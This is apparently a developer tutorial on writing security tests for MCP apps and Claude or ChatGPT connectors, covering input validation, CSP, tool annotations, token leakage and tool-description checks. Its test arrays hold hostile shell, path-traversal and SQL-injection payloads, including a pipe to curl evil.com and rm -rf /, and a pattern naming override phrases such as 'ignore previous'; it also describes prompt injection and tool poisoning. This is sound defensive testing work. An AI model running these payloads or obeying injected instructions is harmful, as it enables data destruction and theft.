
Security Testing for MCP Apps, ChatGPT Apps, and Claude Connectors (April 2026)

Abe Wheeler
MCP Apps · MCP App Testing · MCP App Framework · ChatGPT Apps · ChatGPT App Testing · ChatGPT App Framework · Claude Connectors · Claude Connector Testing · Claude Connector Framework · Security Testing · Security
Security testing MCP App tool handlers, CSP configuration, and auth flows.

AgentSeal scanned 1,808 MCP servers in January 2026 and found that 66% had at least one security finding. The most common issues were shell injection (43%), tooling infrastructure problems (20%), and auth bypass (13%). In April 2026, OX Security disclosed that the MCP STDIO transport allows arbitrary OS command execution, affecting packages with over 150 million combined downloads across LiteLLM, LangChain, LangFlow, and others.

MCP Apps have a smaller attack surface than raw MCP servers because resources run in sandboxed iframes with restrictive CSP. But your tool handlers still run server-side, accept LLM-generated inputs, and can talk to databases, APIs, and file systems. Security bugs in tool handlers ship just as easily as feature bugs, and they’re caught the same way: with automated tests.

TL;DR: Write unit tests that pass malicious inputs to your tool handlers (injection strings, path traversal, oversized payloads). Write integration tests that verify your CSP, tool annotations, and auth token handling through the mcp fixture. Run these alongside your existing test suite in CI. Input validation tests run in milliseconds. CSP and annotation checks run in seconds.

What Security Testing Covers

Security testing for MCP Apps is different from security scanning. Scanners like MCP-Scan (now Snyk Agent Scan) analyze your server configuration and tool descriptions for known patterns. They’re useful, but they can’t test your application logic. They won’t tell you that your execute_query tool handler passes user input straight to a shell command, or that your resource response includes an API key in a field the client-side component renders.

Automated security tests fill that gap. Here’s what to test:

  • Input validation: does your tool handler reject or sanitize malicious inputs?
  • CSP configuration: does your resource’s CSP only allow the origins it needs?
  • Tool annotations: do your annotations accurately describe what each tool does?
  • Auth token handling: are tokens stored server-side and never exposed in resource responses?
  • Response content: does your tool output leak internal data, stack traces, or credentials?

Each of these is testable with the same tools you use for unit tests and integration tests.

Input Validation Testing

The MCP spec is clear on this: “All tool inputs should be treated as untrusted since they come from an LLM rather than directly from the user.” Your tool handler receives arguments from the host’s LLM, and that LLM generates them based on the conversation context. A prompt injection attack can trick the LLM into sending inputs your handler wasn’t designed for.

Shell Injection

If your tool handler runs shell commands, test that metacharacters in inputs don’t break out of the intended command:

import { describe, it, expect } from 'vitest';
import { handler } from '../src/tools/run-lint/handler';

const shellPayloads = [
  'file.ts; rm -rf /',
  'file.ts && cat /etc/passwd',
  'file.ts | curl evil.com',
  '$(whoami)',
  '`whoami`',
  'file.ts\nrm -rf /',
];

describe('run-lint handler rejects shell injection', () => {
  for (const payload of shellPayloads) {
    it(`rejects: ${payload.slice(0, 40)}`, async () => {
      const result = await handler({ filePath: payload });
      expect(result.isError).toBe(true);
    });
  }
});

The fix is almost always to avoid shell commands entirely. Use Node.js APIs (fs.readFile, child_process.execFile with explicit arguments) instead of string-concatenated exec() calls. But the test catches the problem regardless of how you fix it.
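A sketch of that fix, with illustrative names (the `isSafeFilePath` guard and the `eslint` invocation are assumptions, not code from any real handler): validate the input, then pass it to execFile as a discrete argument so no shell ever parses it.

```typescript
import { execFile } from 'node:child_process';

// Hypothetical guard: accept only simple relative paths made of word
// characters, dots, slashes, and dashes, with no parent-directory hops.
function isSafeFilePath(input: string): boolean {
  return /^[\w./-]+$/.test(input) && !input.includes('..');
}

function lintFile(filePath: string): void {
  if (!isSafeFilePath(filePath)) {
    throw new Error('Invalid file path');
  }
  // execFile spawns the binary directly -- no shell is involved, so
  // metacharacters in filePath are literal characters, not syntax.
  execFile('eslint', [filePath], (err, stdout) => {
    /* handle result */
  });
}
```

Even with the guard, execFile is the right default: unlike exec(), it never concatenates arguments into a shell string.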

Path Traversal

Tools that read or write files need to verify that inputs stay within an expected directory:

const traversalPayloads = [
  '../../../etc/passwd',
  '..\\..\\windows\\system32\\config\\sam',
  '/etc/shadow',
  'reports/../../../../etc/hosts',
  'reports/%2e%2e%2f%2e%2e%2fetc/passwd',
];

describe('export handler rejects path traversal', () => {
  for (const payload of traversalPayloads) {
    it(`rejects: ${payload.slice(0, 40)}`, async () => {
      const result = await handler({ outputPath: payload });
      expect(result.isError).toBe(true);
    });
  }
});

A solid implementation resolves the path with path.resolve() and checks that it starts with the allowed base directory. The test confirms this works for common evasion patterns, including URL-encoded sequences.
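In sketch form, with an assumed base directory (the `/srv/app/exports` path and function name are illustrative):

```typescript
import path from 'node:path';

// Assumed base directory for illustration.
const EXPORT_DIR = path.resolve('/srv/app/exports');

function resolveSafeOutputPath(outputPath: string): string {
  // Decode first so URL-encoded sequences like %2e%2e%2f are normalized
  // before the traversal check runs.
  const decoded = decodeURIComponent(outputPath);
  // path.resolve also handles absolute inputs: '/etc/shadow' resolves to
  // itself and fails the prefix check below.
  const resolved = path.resolve(EXPORT_DIR, decoded);
  // Compare against EXPORT_DIR plus a separator so a sibling directory
  // such as /srv/app/exports-evil does not pass the prefix check.
  if (!resolved.startsWith(EXPORT_DIR + path.sep)) {
    throw new Error('outputPath escapes the export directory');
  }
  return resolved;
}
```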

SQL Injection

If your tool queries a database, test the standard injection patterns:

const sqlPayloads = [
  "'; DROP TABLE users; --",
  "' OR '1'='1",
  "1; UPDATE users SET role='admin' WHERE id=1",
  "' UNION SELECT password FROM users --",
];

describe('search handler resists SQL injection', () => {
  for (const payload of sqlPayloads) {
    it(`handles safely: ${payload.slice(0, 40)}`, async () => {
      const result = await handler({ query: payload });
      // Should either return empty results or an error,
      // never execute the injected SQL
      if (!result.isError) {
        expect(result.structuredContent.results).toEqual([]);
      }
    });
  }
});

Parameterized queries prevent SQL injection at the implementation level. These tests verify that your parameterization actually works by checking that injection payloads don’t return unauthorized data or cause unexpected errors.
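As a sketch of the parameterized pattern (table, column, and function names are illustrative, assuming a pg-style client): the user's term travels as a bound value, never as SQL text.

```typescript
// The SQL text is a constant; the payload only ever appears in `values`,
// where the driver sends it as data rather than executable SQL.
type ParamQuery = { text: string; values: unknown[] };

function buildSearchQuery(term: string): ParamQuery {
  return {
    text: 'SELECT id, name FROM items WHERE name ILIKE $1',
    values: [`%${term}%`],
  };
}

// Usage with node-postgres would look like:
//   const q = buildSearchQuery(input);
//   await client.query(q.text, q.values);
```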

Oversized Inputs

Test that your handler doesn’t crash or consume excessive memory when given huge inputs:

it('rejects inputs over 10KB', async () => {
  const result = await handler({ query: 'a'.repeat(100_000) });
  expect(result.isError).toBe(true);
});

Your Zod schema can enforce this with z.string().max(10000), but the test catches the case where someone removes or increases the limit later.

CSP Configuration Testing

MCP App resources run in sandboxed iframes where all external connections are blocked by default. You open access by declaring specific origins in _meta.ui.csp. A misconfigured CSP can let your resource connect to origins you didn’t intend, or block connections it needs.

Write integration tests that inspect your resource’s CSP:

import { test, expect } from 'sunpeak/test';

test('weather resource CSP allows only the weather API', async ({ mcp }) => {
  const result = await mcp.callTool('get-weather', { city: 'Portland' });
  const csp = result.structuredContent._meta.ui.csp;

  // Only the weather API origin should be in connectDomains
  expect(csp.connectDomains).toEqual(['https://api.weather.gov']);

  // No external resources or frames needed
  expect(csp.resourceDomains ?? []).toEqual([]);
  expect(csp.frameDomains ?? []).toEqual([]);
});

A few things to test:

  • Each resource’s connectDomains contains only the API origins it actually calls
  • No wildcard origins (https://*) unless you genuinely need all subdomains of a specific domain
  • frameDomains is empty unless your resource embeds third-party iframes
  • resourceDomains only includes CDN origins you actually load assets from

If your app has multiple resources, test each one separately. A dashboard resource that shows charts from a charting CDN has different CSP needs than a settings resource that calls your own API.

Tool Annotation Testing

Tool annotations tell the host what your tool does: whether it only reads data (readOnlyHint), modifies something (destructiveHint), or reaches external systems (openWorldHint). Incorrect annotations are a security risk because the host uses them to decide when to ask for user confirmation. A destructive tool marked as read-only could execute without a confirmation prompt.

Incorrect annotations are also the #1 reason MCP Apps get rejected from the ChatGPT App Store and Claude Connectors Directory.

import { test, expect } from 'sunpeak/test';

test('tool annotations match actual behavior', async ({ mcp }) => {
  const { tools } = await mcp.listTools();

  for (const tool of tools) {
    const annotations = tool.annotations;

    // Every tool must have annotations
    expect(annotations, `${tool.name} missing annotations`).toBeDefined();

    // Tools that write, delete, or send must be marked destructive
    if (['delete-account', 'send-email', 'update-profile'].includes(tool.name)) {
      expect(annotations.destructiveHint,
        `${tool.name} should be destructiveHint: true`
      ).toBe(true);
      expect(annotations.readOnlyHint,
        `${tool.name} should not be readOnlyHint: true`
      ).not.toBe(true);
    }

    // Read-only tools must not be marked destructive
    if (['get-status', 'search', 'list-items'].includes(tool.name)) {
      expect(annotations.readOnlyHint,
        `${tool.name} should be readOnlyHint: true`
      ).toBe(true);
      expect(annotations.destructiveHint,
        `${tool.name} should not be destructiveHint: true`
      ).not.toBe(true);
    }

    // Tools that touch external systems need openWorldHint
    if (['send-email', 'post-to-slack'].includes(tool.name)) {
      expect(annotations.openWorldHint,
        `${tool.name} should be openWorldHint: true`
      ).toBe(true);
    }
  }
});

This test is higher-maintenance than most, since you need to update the tool lists when you add or rename tools. But it has caught real bugs: one tool renamed from get-users to sync-users (which now writes to an external system) kept its old readOnlyHint: true annotation.

Auth Token Testing

The recommended pattern for auth in MCP Apps is to keep tokens server-side. Your tool handler reads the token from a secure store, calls the API, and returns the result. The resource component never sees the token.
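A minimal sketch of that boundary, assuming a GitHub-backed tool with the token in an environment variable (the env var name, API call, and result shape here are illustrative):

```typescript
type ToolResult = {
  isError?: boolean;
  structuredContent?: Record<string, unknown>;
  content: { type: 'text'; text: string }[];
};

async function getReposHandler(args: { username: string }): Promise<ToolResult> {
  // The token comes from the server's own secret store, never from tool inputs.
  const token = process.env.GITHUB_TOKEN;
  if (!token) {
    return { isError: true, content: [{ type: 'text', text: 'Not connected to GitHub.' }] };
  }
  const res = await fetch(
    `https://api.github.com/users/${encodeURIComponent(args.username)}/repos`,
    { headers: { Authorization: `Bearer ${token}` } },
  );
  const repos = (await res.json()) as { name: string }[];
  // Only derived data goes back to the client; the token stays in this scope.
  return {
    structuredContent: { repos: repos.map((r) => r.name) },
    content: [{ type: 'text', text: `Found ${repos.length} repositories.` }],
  };
}
```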

Test that this boundary holds:

import { describe, it, expect } from 'vitest';
import { handler } from '../src/tools/get-repos/handler';

describe('get-repos handler does not leak tokens', () => {
  it('structuredContent contains no auth tokens', async () => {
    const result = await handler({ username: 'test-user' });
    const content = JSON.stringify(result.structuredContent);

    // Should not contain anything that looks like a token
    expect(content).not.toMatch(/ghp_[A-Za-z0-9]{36}/);
    expect(content).not.toMatch(/Bearer\s+[A-Za-z0-9\-._~+/]+=*/);
    expect(content).not.toMatch(/sk-[A-Za-z0-9]{32,}/);
    expect(content).not.toMatch(/eyJ[A-Za-z0-9_-]+\.eyJ/); // JWT
  });

  it('rejects token passed as tool input', async () => {
    const result = await handler({
      username: 'test-user',
      token: 'ghp_stolen_token_from_prompt_injection',
    });
    // Handler should ignore unexpected fields or error
    expect(result.structuredContent).not.toHaveProperty('token');
  });
});

The MCP spec explicitly prohibits token passthrough: servers “MUST NOT accept any tokens that were not explicitly issued for the MCP server.” This test enforces that your handler ignores tokens passed in tool inputs and doesn’t echo credentials back in responses.

Response Content Testing

Tool handler responses can accidentally leak internal information. Stack traces, database connection strings, internal URLs, and debug metadata can all surface in error responses and get rendered in the resource component for anyone to see.

describe('error responses do not leak internals', () => {
  it('database errors return clean messages', async () => {
    // Force a database error by passing invalid data
    const result = await handler({ id: 'nonexistent-id-999' });

    if (result.isError) {
      const content = JSON.stringify(result.content);
      expect(content).not.toMatch(/ECONNREFUSED/);
      expect(content).not.toMatch(/postgresql:\/\//);
      expect(content).not.toMatch(/at Object\.<anonymous>/); // stack trace
      expect(content).not.toMatch(/node_modules/);
    }
  });
});

Good error handling returns a user-facing message (“Could not find that item”) without exposing what went wrong internally. The MCP App error handling guide covers the implementation side. This test verifies the implementation doesn’t regress.
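The implementation side can be as small as this sketch (the helper name and message are illustrative): log the real error server-side, return only a generic message.

```typescript
type ErrorResult = { isError: true; content: { type: 'text'; text: string }[] };

function toSafeErrorResult(err: unknown): ErrorResult {
  // Full detail stays in server logs where operators can see it.
  console.error('tool handler failed:', err);
  // The client gets a message with no internals to render.
  return {
    isError: true,
    content: [{ type: 'text', text: 'Could not find that item.' }],
  };
}
```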

Tool Description Security

Tool poisoning, where malicious instructions are hidden in tool descriptions, is mainly a risk when MCP clients consume third-party servers. If you’re building the server, you control the descriptions. But it’s still worth testing that your descriptions haven’t been tampered with and don’t contain anything unexpected:

import { test, expect } from 'sunpeak/test';

test('tool descriptions are clean', async ({ mcp }) => {
  const { tools } = await mcp.listTools();

  for (const tool of tools) {
    // Descriptions should be reasonable length
    expect(tool.description.length,
      `${tool.name} description is suspiciously long`
    ).toBeLessThan(500);

    // No HTML or markdown injection
    expect(tool.description).not.toMatch(/<script/i);
    expect(tool.description).not.toMatch(/<img/i);
    expect(tool.description).not.toMatch(/\[.*\]\(javascript:/i);

    // No instruction-like patterns that could influence the LLM
    expect(tool.description.toLowerCase()).not.toMatch(
      /\b(ignore previous|disregard|forget|override|instead do)\b/
    );
  }
});

This is a lightweight check. For supply chain concerns where you consume other MCP servers, tools like MCP-Scan (Snyk Agent Scan) do deeper analysis of tool descriptions using semantic similarity and Unicode deobfuscation.

Running Security Tests in CI

Security tests should run on every pull request. They use the same test runners as your other tests, so there’s nothing extra to configure. Input validation unit tests go in tests/unit/ and run with pnpm test:unit. CSP and annotation tests use the mcp fixture and run with pnpm test:e2e.

If your project already has a GitHub Actions workflow, security tests run automatically:

# Runs both unit and e2e tests, including security tests
- run: pnpm test:unit
- run: pnpm test:e2e

For an extra layer, add a static scanner alongside your test suite:

- name: Run MCP security scan
  run: npx @anthropic-ai/mcp-scan@latest scan --format sarif > results.sarif

The combination of automated tests (which verify your specific application logic) and static scanning (which catches known vulnerability patterns) covers more ground than either approach alone.

Organizing Security Tests

Keep security tests alongside your other tests rather than in a separate directory. Input validation tests for a tool handler belong next to the handler’s other unit tests. CSP tests belong with your integration tests. This way, when someone modifies a tool, they see the security tests in the same file and update them together.

A practical layout:

tests/
  unit/
    get-repos.test.ts       # includes input validation + token leak tests
    export-data.test.ts     # includes path traversal tests
    search.test.ts          # includes SQL injection tests
  e2e/
    annotations.test.ts     # tool annotation verification
    csp.test.ts             # CSP configuration checks
    descriptions.test.ts    # tool description security

Running pnpm test:unit && pnpm test:e2e catches everything, and security tests don’t need a separate CI step or specialized runner. They work locally and in CI the same way, with no paid accounts or external dependencies.

Get Started

Documentation →
npx sunpeak new

Frequently Asked Questions

What security vulnerabilities are most common in MCP Apps?

The most common security issues in MCP Apps are command injection through tool handler inputs, misconfigured Content Security Policy (CSP) that allows unintended external connections, unsafe auth token handling where tokens are exposed client-side or passed through tool inputs, missing or incorrect tool annotations that give hosts wrong information about what a tool does, and path traversal in file-handling tools. AgentSeal found that 66% of 1,808 MCP servers had at least one security finding.

How do I test MCP App tool handlers for injection vulnerabilities?

Write unit tests that pass malicious inputs to your tool handler function directly. Test shell metacharacters (semicolons, pipes, backticks), path traversal sequences (../), SQL injection patterns (OR 1=1), and oversized inputs. Assert that your handler either rejects the input with a validation error or sanitizes it before use. Run these tests with pnpm test:unit.

How do I verify my MCP App CSP configuration is correct?

Write integration tests using the mcp fixture that call mcp.listResources() or mcp.callTool() and inspect the _meta.ui.csp field on the returned resource. Assert that connectDomains, resourceDomains, and frameDomains only contain origins your app actually needs. Test that no wildcard origins or overly broad patterns are present. Run with pnpm test:e2e.

How do I test auth token handling in an MCP App?

Write unit tests for your tool handler that verify tokens come from server-side storage, not from tool inputs. Assert that your structuredContent response does not include raw tokens, API keys, or session secrets in fields the resource component will render. For tools that use OAuth, test that the handler rejects requests with missing or expired tokens and returns an appropriate error.

What is tool poisoning and how do I test for it?

Tool poisoning is when malicious instructions are hidden in MCP tool descriptions, invisible to users but followed by the LLM. While this mainly affects MCP clients consuming third-party servers, you should still test that your own tool descriptions contain only factual documentation and no injected instructions. Write a test that calls mcp.listTools() and asserts each tool description is under a reasonable length and contains no HTML, markdown injection, or instruction-like patterns.

Should I run security tests in CI/CD for MCP Apps?

Yes. Security tests should run on every pull request alongside your unit and integration tests. Add them to your existing pnpm test:unit and pnpm test:e2e commands. Input validation tests run in milliseconds with Vitest. CSP and annotation verification tests run through the mcp fixture in seconds. Both work in GitHub Actions and any CI environment without paid accounts or API keys.

How do I test that my MCP App tool annotations are secure?

Use the mcp fixture to call mcp.listTools() and verify every tool has readOnlyHint, destructiveHint, and openWorldHint set correctly. A tool that writes data must not have readOnlyHint: true. A tool that deletes data must have destructiveHint: true. Incorrect annotations can cause hosts to skip confirmation prompts for dangerous operations, which is both a security risk and a submission rejection reason.

What security testing tools exist for MCP servers besides sunpeak?

MCP-Scan (now Snyk Agent Scan) is the most widely adopted MCP security scanner with over 2,000 GitHub stars. AgentSeal scans for supply chain attacks, prompt injection, and tool poisoning. Cisco mcp-scanner uses YARA-based pattern detection. AgentAuditKit is a GitHub Action for CI scanning of MCP pipelines. These tools scan server configurations and descriptions. sunpeak complements them by letting you write automated tests against your running app.